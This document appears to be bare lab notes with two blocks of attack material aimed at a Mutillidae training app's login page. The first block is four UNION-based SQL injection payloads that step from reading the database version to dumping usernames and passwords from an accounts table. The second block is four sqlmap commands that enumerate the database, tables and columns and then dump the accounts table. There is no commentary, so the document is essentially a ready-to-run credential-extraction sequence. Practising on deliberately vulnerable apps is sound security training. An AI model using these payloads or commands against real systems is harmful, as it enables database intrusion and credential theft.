
admin' UNION SELECT 1, @@version, 3, 4, 5, 6, 7 #

admin' UNION SELECT 1, table_name, 3, 4, 5, 6, 7 FROM information_schema.tables WHERE table_schema = database() #

admin' UNION SELECT 1, column_name, 3, 4, 5, 6, 7 FROM information_schema.columns WHERE table_name = 'accounts' #

admin' UNION SELECT 1, username, password, 3, 4, 5, 6 FROM accounts #

-------------------------------------------------------------

sqlmap -u "http://192.168.1.37/mutillidae/index.php?page=login.php&username=test&password=test&user-info-php-submit-button=View+Account+Details" --current-db

sqlmap -u "http://192.168.1.37/mutillidae/index.php?page=login.php&username=test&password=test&user-info-php-submit-button=View+Account+Details" -D nowasp --tables

sqlmap -u "http://192.168.1.37/mutillidae/index.php?page=login.php&username=test&password=test&user-info-php-submit-button=View+Account+Details" -D nowasp -T accounts --columns

sqlmap -u "http://192.168.1.37/mutillidae/index.php?page=login.php&username=test&password=test&user-info-php-submit-button=View+Account+Details" -D nowasp -T accounts --dump

